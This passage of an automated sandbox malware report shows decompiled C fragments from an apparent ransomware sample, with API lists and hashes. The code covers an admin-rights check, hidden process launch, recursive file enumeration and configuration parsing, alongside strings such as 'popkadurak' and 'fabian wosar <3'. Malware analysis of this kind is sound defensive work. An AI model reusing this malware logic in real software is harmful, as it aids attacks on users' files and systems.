							wsprintfW(_t23, L"%s ", _t40);
							_t35 =  *0xfe72a60; // 0x0
							_t28 = 0;
							_v8 = 0;
							if( *_t23 == 0) {
								L20:
								_t29 =  !=  ? 1 : _t28;
								_v8 =  !=  ? 1 : _t28;
							} else {
								_t26 =  *_t35 & 0x0000ffff;
								if(_t26 != 0) {
									_t44 = _t35 - _t23;
									do {
										_t20 = _t23;
										if(_t26 == 0) {
											L16:
											if( *_t20 == 0) {
												goto L19;
											} else {
												goto L17;
											}
										} else {
											while(1) {
												_t27 =  *_t20 & 0x0000ffff;
												if(_t27 == 0) {
													break;
												}
												_t31 = ( *(_t44 + _t20) & 0x0000ffff) - _t27;
												if(_t31 != 0) {
													goto L16;
												} else {
													_t20 = _t20 + 2;
													if( *(_t44 + _t20) != _t31) {
														continue;
													} else {
														goto L16;
													}
												}
												goto L21;
											}
											L19:
											_t28 = 0;
											goto L20;
										}
										goto L21;
										L17:
										_t26 = _t35[1] & 0x0000ffff;
										_t35 =  &(_t35[1]);
										_t44 = _t44 + 2;
									} while (_t26 != 0);
								}
							}
							L21:
							VirtualFree(_t23, 0, 0x8000);
							return _v8;
						} else {
							goto L7;
						}
					}
				} else {
					return 1;
				}
			}

0x0fe669b3
0x0fe669bc
0x0fe669be
0x0fe669d2
0x0fe669d7
0x0fe669dc
0x0fe669f0
0x0fe669fa
0x0fe669e0
0x0fe669e0
0x0fe669e6
0x0fe669e9
0x0fe669ea
0x00000000
0x00000000
0x00000000
0x0fe669ea
0x0fe669ee
0x0fe66a17
0x0fe66a1f
0x0fe66a25
0x0fe66a2b
0x0fe66a30
0x0fe66a36
0x0fe66a82
0x0fe66a89
0x0fe66a8c
0x0fe66a38
0x0fe66a38
0x0fe66a3e
0x0fe66a42
0x0fe66a44
0x0fe66a44
0x0fe66a49
0x0fe66a69
0x0fe66a6d
0x00000000
0x00000000
0x00000000
0x00000000
0x0fe66a4b
0x0fe66a50
0x0fe66a50
0x0fe66a56
0x00000000
0x00000000
0x0fe66a5c
0x0fe66a5e
0x00000000
0x0fe66a60
0x0fe66a60
0x0fe66a67
0x00000000
0x00000000
0x00000000
0x00000000
0x0fe66a67
0x00000000
0x0fe66a5e
0x0fe66a80
0x0fe66a80
0x00000000
0x0fe66a80
0x00000000
0x0fe66a6f
0x0fe66a6f
0x0fe66a73
0x0fe66a76
0x0fe66a79
0x0fe66a7e
0x0fe66a3e
0x0fe66a8f
0x0fe66a97
0x0fe66aa6
0x00000000
0x00000000
0x00000000
0x0fe669ee
0x0fe669c0
0x0fe669c9
0x0fe669c9

APIs

lstrlenW.KERNEL32(00000000,00000010,00000000,00000000,?,0FE66AEA), ref: 0FE669D2

Strings

%s , xrefs: 0FE66A19

Memory Dump Source

Source File: 00000002.00000002.370313437.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000002.00000002.370270818.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370323598.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370333139.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370340833.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID: %s
API String ID: 1659193697-4273690596
Opcode ID: 3f8056916eb7b0ff61133e6d40045b7714e09e89491d420760dd0108bed40391
Instruction ID: 04436c4035763697e6bf30973b7f90f7e72112e38654ca8dbe7607d998449d07
Opcode Fuzzy Hash: 3f8056916eb7b0ff61133e6d40045b7714e09e89491d420760dd0108bed40391
Instruction Fuzzy Hash: D8215772AA122C97D7304B1D9C003B273E8EF817A9F44923AEC0A9F181E7B5AD4083D0

Uniqueness

Uniqueness Score: -1.00%

Function 0FE64E10 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51
processCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0FE64E10(WCHAR* __ecx) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOW _v92;
				intOrPtr _t15;
				intOrPtr _t16;
				WCHAR* _t25;

				asm("xorps xmm0, xmm0");
				_t25 = __ecx;
				asm("movdqu [ebp-0x10], xmm0");
				E0FE69170( &_v92, 0, 0x44);
				_t15 =  *0xfe72a6c; // 0x0
				_v92.hStdError = _t15;
				_v92.hStdOutput = _t15;
				_t16 =  *0xfe72a68; // 0x0
				_v92.dwFlags = _v92.dwFlags | 0x00000101;
				_v92.hStdInput = _t16;
				_v92.wShowWindow = 0;
				_v92.cb = 0x44;
				if(CreateProcessW(0, _t25, 0, 0, 1, 0, 0, 0,  &_v92,  &_v20) != 0) {
					CloseHandle(_v20);
					return CloseHandle(_v20.hThread);
				} else {
					return GetLastError();
				}
			}

0x0fe64e1c
0x0fe64e22
0x0fe64e24
0x0fe64e29
0x0fe64e2e
0x0fe64e36
0x0fe64e39
0x0fe64e3c
0x0fe64e41
0x0fe64e48
0x0fe64e4d
0x0fe64e58
0x0fe64e77
0x0fe64e8d
0x0fe64e98
0x0fe64e79
0x0fe64e83
0x0fe64e83

APIs

_memset.LIBCMT ref: 0FE64E29
CreateProcessW.KERNEL32 ref: 0FE64E6F
GetLastError.KERNEL32(?,?,00000000), ref: 0FE64E79
CloseHandle.KERNEL32(?,?,?,00000000), ref: 0FE64E8D
CloseHandle.KERNEL32(?,?,?,00000000), ref: 0FE64E92

Strings

D, xrefs: 0FE64E58

Memory Dump Source

Source File: 00000002.00000002.370313437.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000002.00000002.370270818.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370323598.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370333139.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370340833.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateErrorLastProcess_memset
String ID: D
API String ID: 1393943095-2746444292
Opcode ID: ee60e0e9121d4b7046675f5288fa45b32a4299210321be3a91b2f4a24193f42b
Instruction ID: f62ae1e545637a2582eebb2137ea6e4d4cb50a21b3f0ea497c7699c307f95602
Opcode Fuzzy Hash: ee60e0e9121d4b7046675f5288fa45b32a4299210321be3a91b2f4a24193f42b
Instruction Fuzzy Hash: 28012171E4031CABDB20DBA59C45BDE7BB8EF05765F100126F608BA180E7B525548B94

Uniqueness

Uniqueness Score: -1.00%

Function 0FE63C70 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43
memorylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E0FE63C70() {
				signed int _v8;
				void* _v12;
				short _v16;
				struct _SID_IDENTIFIER_AUTHORITY _v20;
				int _t13;
				_Unknown_base(*)()* _t15;
				signed int _t16;

				_v20.Value = 0;
				_v16 = 0x500;
				_t13 = AllocateAndInitializeSid( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
				if(_t13 != 0) {
					_t15 = GetProcAddress(GetModuleHandleA("advapi32.dll"), "CheckTokenMembership");
					_t16 =  *_t15(0, _v12,  &_v8);
					asm("sbb eax, eax");
					_v8 = _v8 &  ~_t16;
					FreeSid(_v12);
					return _v8;
				} else {
					return _t13;
				}
			}

0x0fe63c79
0x0fe63c99
0x0fe63ca0
0x0fe63ca8
0x0fe63cbf
0x0fe63cce
0x0fe63cd5
0x0fe63cd7
0x0fe63cda
0x0fe63ce6
0x0fe63cad
0x0fe63cad
0x0fe63cad

APIs

AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0FE63CA0
GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0FE63CB3
GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0FE63CBF
FreeSid.ADVAPI32(?), ref: 0FE63CDA

Strings

CheckTokenMembership, xrefs: 0FE63CB9
advapi32.dll, xrefs: 0FE63CAE

Memory Dump Source

Source File: 00000002.00000002.370313437.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000002.00000002.370270818.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370323598.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370333139.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370340833.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: AddressAllocateFreeHandleInitializeModuleProc
String ID: CheckTokenMembership$advapi32.dll
API String ID: 3309497720-1888249752
Opcode ID: 776c73fe661ac1e075c4f8bbb9428ea429f615aea98856a8b50fb2e356bf36fb
Instruction ID: 8d92432b3251bcfe7d2173dc999c093f062ae323b814769c364f71188c24d3ce
Opcode Fuzzy Hash: 776c73fe661ac1e075c4f8bbb9428ea429f615aea98856a8b50fb2e356bf36fb
Instruction Fuzzy Hash: 37F04970E8030DBBEB009FE5EC0AFAEB7B8FB04B56F000594F900A6281E77866148B51

Uniqueness

Uniqueness Score: -1.00%

Function 0FE66E69 Relevance: 9.0, APIs: 6, Instructions: 48
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0FE66E69() {
				intOrPtr* _t34;
				intOrPtr* _t38;
				void* _t40;
				WCHAR* _t46;
				void* _t51;

				do {
					if(lstrcmpW(_t51 - 0x238, ".") != 0 && lstrcmpW(_t51 - 0x238, L"..") != 0) {
						lstrcatW(_t46, _t51 - 0x238);
						if(( *(_t51 - 0x264) & 0x00000010) == 0) {
							 *((intOrPtr*)(_t51 - 0xc)) =  *_t38;
							 *_t38 =  *_t38 + E0FE66AB0(_t46, _t51 - 0x264, __eflags, _t40,  *((intOrPtr*)(_t51 + 8)));
							asm("adc [ebx+0x4], edx");
							__eflags =  *((intOrPtr*)(_t38 + 4)) -  *((intOrPtr*)(_t38 + 4));
							if(__eflags <= 0) {
								if(__eflags < 0) {
									L8:
									_t34 =  *((intOrPtr*)(_t51 + 0xc));
									 *_t34 =  *_t34 + 1;
									__eflags =  *_t34;
								} else {
									__eflags =  *((intOrPtr*)(_t51 - 0xc)) -  *_t38;
									if(__eflags < 0) {
										goto L8;
									}
								}
							}
						} else {
							E0FE66DF0(lstrcatW(_t46, "\\"), _t46,  *((intOrPtr*)(_t51 - 0x14)),  *((intOrPtr*)(_t51 + 8)),  *((intOrPtr*)(_t51 + 0xc)), _t38);
						}
						 *((short*)( *((intOrPtr*)(_t51 - 0x10)))) = 0;
					}
				} while (FindNextFileW( *(_t51 - 8), _t51 - 0x264) != 0);
				FindClose( *(_t51 - 8));
				return 0;
			}

0x0fe66e70
0x0fe66e84
0x0fe66ea8
0x0fe66eb1
0x0fe66ee2
0x0fe66eed
0x0fe66eef
0x0fe66ef2
0x0fe66ef5
0x0fe66ef7
0x0fe66f00
0x0fe66f00
0x0fe66f03
0x0fe66f03
0x0fe66ef9
0x0fe66efc
0x0fe66efe
0x00000000
0x00000000
0x0fe66efe
0x0fe66ef7
0x0fe66eb3
0x0fe66ec7
0x0fe66ecc
0x0fe66f10
0x0fe66f10
0x0fe66f23
0x0fe66f2e
0x0fe66f3c

APIs

lstrcmpW.KERNEL32(?,0FE6FF48,?,?), ref: 0FE66E7C
lstrcmpW.KERNEL32(?,0FE6FF4C,?,?), ref: 0FE66E96
lstrcatW.KERNEL32(00000000,?), ref: 0FE66EA8
lstrcatW.KERNEL32(00000000,0FE6FF7C), ref: 0FE66EB9

Part of subcall function 0FE66DF0: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0FE66E23
Part of subcall function 0FE66DF0: lstrcatW.KERNEL32(00000000,0FE6FF44), ref: 0FE66E3B
Part of subcall function 0FE66DF0: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0FE66E45

FindNextFileW.KERNEL32(00003000,?,?,?), ref: 0FE66F1D
FindClose.KERNEL32(00003000,?,?), ref: 0FE66F2E

Memory Dump Source

Source File: 00000002.00000002.370313437.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000002.00000002.370270818.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370323598.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370333139.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370340833.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: Findlstrcat$Filelstrcmp$CloseFirstNextlstrlen
String ID:
API String ID: 2032009209-0
Opcode ID: ef1c22519ee6b56b27efa3b4805937b4459632003ac36539f266ee9fd4d0c5ab
Instruction ID: 209b2c3fd9339854a2f96eaa0c6c728ff7326a6b216430667c3e22bd5c08afa7
Opcode Fuzzy Hash: ef1c22519ee6b56b27efa3b4805937b4459632003ac36539f266ee9fd4d0c5ab
Instruction Fuzzy Hash: 35019231A4424DABCF21AF61EC48BEEBBB9FF05784F0050B5F805E6011EB359A50DB50

Uniqueness

Uniqueness Score: -1.00%

Function 0FE63200 Relevance: 8.8, APIs: 7, Instructions: 73
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FE63200(void* __ecx, CHAR* _a4, intOrPtr _a8) {
				char _t5;
				char _t6;
				intOrPtr _t8;
				int _t10;
				CHAR* _t13;
				int _t15;
				void* _t18;
				CHAR* _t21;
				CHAR* _t23;

				_t23 = _a4;
				_t18 = __ecx;
				_t5 =  *_t23;
				if(_t5 == 0) {
					L4:
					_t6 =  *_t23;
					if(_t6 == 0x7d) {
						goto L10;
					} else {
						_t21 = _t23;
						if(_t6 != 0) {
							while( *_t21 != 0x7d) {
								_t21 =  &(_t21[1]);
								if( *_t21 != 0) {
									continue;
								} else {
								}
								goto L12;
							}
							 *_t21 = 0;
						}
						L12:
						_t8 = _a8;
						if(_t8 != 1) {
							if(_t8 == 2) {
								_t10 = lstrlenA(_t23);
								_t13 = HeapAlloc(GetProcessHeap(), 8, _t10 + 1);
								 *(_t18 + 8) = _t13;
								goto L16;
							}
						} else {
							_t15 = lstrlenA(_t23);
							_t13 = HeapAlloc(GetProcessHeap(), 8, _t15 + 1);
							 *(_t18 + 4) = _t13;
							L16:
							if(_t13 != 0) {
								lstrcpyA(_t13, _t23);
							}
						}
						 *_t21 = 0x7d;
						return 1;
					}
				} else {
					while(_t5 != 0x7d) {
						_t23 =  &(_t23[1]);
						if(_t5 == 0x3d) {
							goto L4;
						} else {
							_t5 =  *_t23;
							if(_t5 != 0) {
								continue;
							} else {
								goto L4;
							}
						}
						goto L19;
					}
					L10:
					return 0;
				}
				L19:
			}

0x0fe63205
0x0fe63208
0x0fe6320a
0x0fe6320e
0x0fe6321f
0x0fe6321f
0x0fe63223
0x00000000
0x0fe63225
0x0fe63226
0x0fe6322a
0x0fe63230
0x0fe63235
0x0fe63239
0x00000000
0x00000000
0x0fe6323b
0x00000000
0x0fe63239
0x0fe63245
0x0fe63245
0x0fe63248
0x0fe63248
0x0fe6324e
0x0fe63270
0x0fe63273
0x0fe63284
0x0fe6328a
0x00000000
0x0fe6328a
0x0fe63250
0x0fe63251
0x0fe63262
0x0fe63268
0x0fe6328d
0x0fe6328f
0x0fe63293
0x0fe63293
0x0fe6328f
0x0fe63299
0x0fe632a5
0x0fe632a5
0x0fe63210
0x0fe63210
0x0fe63214
0x0fe63217
0x00000000
0x0fe63219
0x0fe63219
0x0fe6321d
0x00000000
0x00000000
0x00000000
0x00000000
0x0fe6321d
0x00000000
0x0fe63217
0x0fe6323e
0x0fe63242
0x0fe63242
0x00000000

APIs

lstrlenA.KERNEL32(0FE65444,00000000,?,0FE65445,?,0FE634BF,0FE65445,00000001,0FE65445,00000000,00000000,00000000,?,?,0FE65444,00000000), ref: 0FE63251
GetProcessHeap.KERNEL32(00000008,00000001,?,0FE634BF,0FE65445,00000001,0FE65445,00000000,00000000,00000000,?,?,0FE65444,00000000), ref: 0FE6325B
HeapAlloc.KERNEL32(00000000,?,0FE634BF,0FE65445,00000001,0FE65445,00000000,00000000,00000000,?,?,0FE65444,00000000), ref: 0FE63262
lstrlenA.KERNEL32(0FE65444,00000000,?,0FE65445,?,0FE634BF,0FE65445,00000001,0FE65445,00000000,00000000,00000000,?,?,0FE65444,00000000), ref: 0FE63273
GetProcessHeap.KERNEL32(00000008,00000001,?,0FE634BF,0FE65445,00000001,0FE65445,00000000,00000000,00000000,?,?,0FE65444,00000000), ref: 0FE6327D
HeapAlloc.KERNEL32(00000000,?,0FE634BF,0FE65445,00000001,0FE65445,00000000,00000000,00000000,?,?,0FE65444,00000000), ref: 0FE63284
lstrcpyA.KERNEL32(00000000,0FE65444,?,0FE634BF,0FE65445,00000001,0FE65445,00000000,00000000,00000000,?,?,0FE65444,00000000), ref: 0FE63293

Memory Dump Source

Source File: 00000002.00000002.370313437.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000002.00000002.370270818.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370323598.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370333139.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370340833.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcesslstrlen$lstrcpy
String ID:
API String ID: 511007297-0
Opcode ID: cf7faf01de64981f78617d83b28c9cef647e5fdd9d8e77ec36a7ae17c65448eb
Instruction ID: e53baa95c169132b52004e3b2cfb61629b5c47e2cba2d399c7df1c74df2ce499
Opcode Fuzzy Hash: cf7faf01de64981f78617d83b28c9cef647e5fdd9d8e77ec36a7ae17c65448eb
Instruction Fuzzy Hash: 081129B048414C6EE7101F68940C7A7BB58EF837EDF645016E8C5DB303C739A46687A0

Uniqueness

Uniqueness Score: -1.00%

Function 0FE633E0 Relevance: 7.6, APIs: 5, Instructions: 101
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0FE633E0(int* __ecx, void* __eflags, CHAR* _a4) {
				int* _v8;
				void* _t8;
				char _t10;
				void* _t14;
				void* _t15;
				char _t18;
				char _t19;
				int _t20;
				CHAR* _t23;
				CHAR* _t26;
				CHAR* _t35;
				CHAR* _t40;

				_push(__ecx);
				_t26 = _a4;
				_t37 = __ecx;
				_v8 = __ecx;
				__ecx[3] = _t26;
				_t8 = E0FE632B0(__ecx);
				if(_t8 == 0 || _t8 == 0xffffffff) {
					ExitProcess(0);
				}
				if(E0FE63320(__ecx) == 0) {
					 *__ecx = 0;
					_t10 =  *_t26;
					if(_t10 == 0) {
						goto L4;
					} else {
						do {
							if(_t10 == 0x7b) {
								_t26 =  &(_t26[1]);
								_t14 = E0FE63190(_t26);
								if(_t14 != 0) {
									_t15 = _t14 - 1;
									if(_t15 == 0) {
										E0FE63200(_t37, _t26, 1);
									} else {
										if(_t15 == 1) {
											_t18 =  *_t26;
											_t35 = _t26;
											if(_t18 == 0) {
												L15:
												_t19 =  *_t35;
												if(_t19 != 0x7d) {
													_t40 = _t35;
													if(_t19 != 0) {
														while( *_t40 != 0x7d) {
															_t40 =  &(_t40[1]);
															if( *_t40 != 0) {
																continue;
															} else {
															}
															goto L21;
														}
														 *_t40 = 0;
													}
													L21:
													_t20 = lstrlenA(_t35);
													_t23 = HeapAlloc(GetProcessHeap(), 8, _t20 + 1);
													 *(_v8 + 8) = _t23;
													if(_t23 != 0) {
														lstrcpyA(_t23, _t35);
													}
													 *_t40 = 0x7d;
													_t37 = _v8;
												}
											} else {
												while(_t18 != 0x7d) {
													_t35 =  &(_t35[1]);
													if(_t18 == 0x3d) {
														goto L15;
													} else {
														_t18 =  *_t35;
														if(_t18 != 0) {
															continue;
														} else {
															goto L15;
														}
													}
													goto L25;
												}
											}
										}
									}
								}
							}
							L25:
							_t7 =  &(_t26[1]); // 0x97850fe0
							_t10 =  *_t7;
							_t26 =  &(_t26[1]);
						} while (_t10 != 0);
						return 1;
					}
				} else {
					 *__ecx = 1;
					L4:
					return 1;
				}
			}

0x0fe633e3
0x0fe633e5
0x0fe633e9
0x0fe633eb
0x0fe633ee
0x0fe633f1
0x0fe633f8
0x0fe634db
0x0fe634db
0x0fe63410
0x0fe63425
0x0fe6342b
0x0fe6342f
0x00000000
0x0fe63431
0x0fe63432
0x0fe63434
0x0fe6343a
0x0fe63441
0x0fe63444
0x0fe6344a
0x0fe6344b
0x0fe634ba
0x0fe6344d
0x0fe6344e
0x0fe63450
0x0fe63452
0x0fe63456
0x0fe63467
0x0fe63467
0x0fe6346b
0x0fe6346d
0x0fe63471
0x0fe63473
0x0fe63478
0x0fe6347c
0x00000000
0x00000000
0x0fe6347e
0x00000000
0x0fe6347c
0x0fe63480
0x0fe63480
0x0fe63483
0x0fe63484
0x0fe63495
0x0fe6349e
0x0fe634a3
0x0fe634a7
0x0fe634a7
0x0fe634ad
0x0fe634b0
0x0fe634b0
0x00000000
0x0fe63458
0x0fe6345c
0x0fe6345f
0x00000000
0x0fe63461
0x0fe63461
0x0fe63465
0x00000000
0x00000000
0x00000000
0x00000000
0x0fe63465
0x00000000
0x0fe6345f
0x0fe63458
0x0fe63456
0x0fe6344e
0x0fe6344b
0x0fe63444
0x0fe634bf
0x0fe634bf
0x0fe634bf
0x0fe634c2
0x0fe634c3
0x0fe634d6
0x0fe634d6
0x0fe63412
0x0fe63412
0x0fe63418
0x0fe63422
0x0fe63422

APIs

Part of subcall function 0FE632B0: lstrlenA.KERNEL32(?,00000000,?,0FE65444,?,?,0FE633F6,00000000,00000000,?,?,0FE65444,00000000), ref: 0FE632C5
Part of subcall function 0FE632B0: lstrlenA.KERNEL32(?,?,0FE633F6,00000000,00000000,?,?,0FE65444,00000000,?,?,?,?,0FE65615,00000000,popkadurak), ref: 0FE632EE

lstrlenA.KERNEL32(0FE65445,0FE65445,00000000,00000000,00000000,?,?,0FE65444,00000000,?,?,?,?,0FE65615,00000000,popkadurak), ref: 0FE63484
GetProcessHeap.KERNEL32(00000008,00000001,?,0FE65444,00000000,?,?,?,?,0FE65615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0FE6348E
HeapAlloc.KERNEL32(00000000,?,0FE65444,00000000,?,?,?,?,0FE65615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0FE63495
lstrcpyA.KERNEL32(00000000,0FE65445,?,0FE65444,00000000,?,?,?,?,0FE65615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0FE634A7
ExitProcess.KERNEL32 ref: 0FE634DB

Memory Dump Source

Source File: 00000002.00000002.370313437.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000002.00000002.370270818.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370323598.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370333139.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370340833.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: lstrlen$HeapProcess$AllocExitlstrcpy
String ID:
API String ID: 1867342102-0
Opcode ID: 5e4433a199ba9746d8a669ffe02ac9b6c0ae64fb1f8a40d28a8b47a1943e8595
Instruction ID: 35f9676ff62a7dd7f40bde4a17c7b415abd7a126b866953b31e897618aedd4f1
Opcode Fuzzy Hash: 5e4433a199ba9746d8a669ffe02ac9b6c0ae64fb1f8a40d28a8b47a1943e8595
Instruction Fuzzy Hash: 24313B7458424D5EDB221F2884447F6FBA49B023D8F94615AE8C5DB383D63DA447C760

Uniqueness

Uniqueness Score: -1.00%

Function 0FE63CF0 Relevance: 7.6, APIs: 5, Instructions: 53COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0FE63D42
VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 0FE63D66
VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 0FE63D6A
VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 0FE63D6E
VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 0FE63D95

Memory Dump Source

Source File: 00000002.00000002.370313437.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000002.00000002.370270818.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370323598.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370333139.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370340833.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: ConditionMask$InfoVerifyVersion_memset
String ID:
API String ID: 3299124433-0
Opcode ID: d8aadebea9dbdb255323ae30613529b8dbc7b8f51f0148ea0a3ac751c342b52f
Instruction ID: 2ff9e5369dc46f0b0de66f5e720302f210d528150afcd27073b58abfc651514b
Opcode Fuzzy Hash: d8aadebea9dbdb255323ae30613529b8dbc7b8f51f0148ea0a3ac751c342b52f
Instruction Fuzzy Hash: C8111EB0D4031C6EEB609F65DC0ABEB7ABCEB08700F008199A608E61C1D6B95B948FD5

Uniqueness

Uniqueness Score: -1.00%

Function 0FE64EA0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 116
stringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0FE64EA0(intOrPtr* __ecx, CHAR* __edx, intOrPtr* _a4) {
				CHAR* _v8;
				char _v12;
				char _v20;
				char _t16;
				char _t20;
				char _t21;
				intOrPtr* _t24;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr* _t29;
				CHAR* _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				void* _t38;
				void* _t41;
				intOrPtr* _t42;
				void* _t47;
				void* _t49;
				intOrPtr* _t51;
				CHAR* _t53;

				asm("movq xmm0, [0xfe6faac]");
				_t16 =  *0xfe6fab4; // 0x0
				_t29 = _a4;
				_v8 = __edx;
				_t51 = __ecx;
				asm("movq [ebp-0x10], xmm0");
				_v12 = _t16;
				if( *_t29 == 0) {
					L11:
					if(_t51 == 0) {
						goto L10;
					} else {
						if(_v20 == 0) {
							L22:
							if(_t51 == 0) {
								goto L10;
							} else {
								_t53 = _t51 + lstrlenA( &_v20);
								while(1) {
									_t20 =  *_t53;
									if(_t20 >= 0x30 && _t20 <= 0x39) {
										break;
									}
									_t53 =  &(_t53[1]);
								}
								_t33 = _t53;
								while(1) {
									_t21 =  *_t33;
									if(_t21 < 0x30 || _t21 > 0x39) {
										goto L30;
									}
									L31:
									_t33 =  &(_t33[1]);
									continue;
									L30:
									if(_t21 == 0x2e) {
										goto L31;
									}
									 *_t33 = 0;
									return lstrcpyA(_v8, _t53);
									goto L33;
								}
							}
						} else {
							_t34 =  *_t51;
							if(_t34 != 0) {
								_t47 = _t51 -  &_v20;
								do {
									_t24 =  &_v20;
									if(_t34 == 0) {
										L19:
										if( *_t24 == 0) {
											goto L22;
										} else {
											goto L20;
										}
									} else {
										while(1) {
											_t35 =  *_t24;
											if(_t35 == 0) {
												goto L22;
											}
											_t41 =  *((char*)(_t47 + _t24)) - _t35;
											if(_t41 != 0) {
												goto L19;
											} else {
												_t24 = _t24 + 1;
												if( *((intOrPtr*)(_t47 + _t24)) != _t41) {
													continue;
												} else {
													goto L19;
												}
											}
											goto L33;
										}
										goto L22;
									}
									goto L33;
									L20:
									_t34 =  *((intOrPtr*)(_t51 + 1));
									_t51 = _t51 + 1;
									_t47 = _t47 + 1;
								} while (_t34 != 0);
							}
							goto L10;
						}
					}
				} else {
					_t25 =  *__ecx;
					if(_t25 == 0) {
						L10:
						return lstrcpyA(_v8, "fabian wosar <3");
					} else {
						_t49 = __ecx - _t29;
						do {
							_t42 = _t29;
							if(_t25 == 0) {
								L8:
								if( *_t42 == 0) {
									goto L11;
								} else {
									goto L9;
								}
							} else {
								while(1) {
									_t26 =  *_t42;
									if(_t26 == 0) {
										goto L11;
									}
									_t38 =  *((char*)(_t49 + _t42)) - _t26;
									if(_t38 != 0) {
										goto L8;
									} else {
										_t42 = _t42 + 1;
										if( *((intOrPtr*)(_t49 + _t42)) != _t38) {
											continue;
										} else {
											goto L8;
										}
									}
									goto L33;
								}
								goto L11;
							}
							goto L33;
							L9:
							_t25 =  *((intOrPtr*)(_t51 + 1));
							_t51 = _t51 + 1;
							_t49 = _t49 + 1;
						} while (_t25 != 0);
						goto L10;
					}
				}
				L33:
			}

0x0fe64ea6
0x0fe64eae
0x0fe64eb4
0x0fe64eb9
0x0fe64ebc
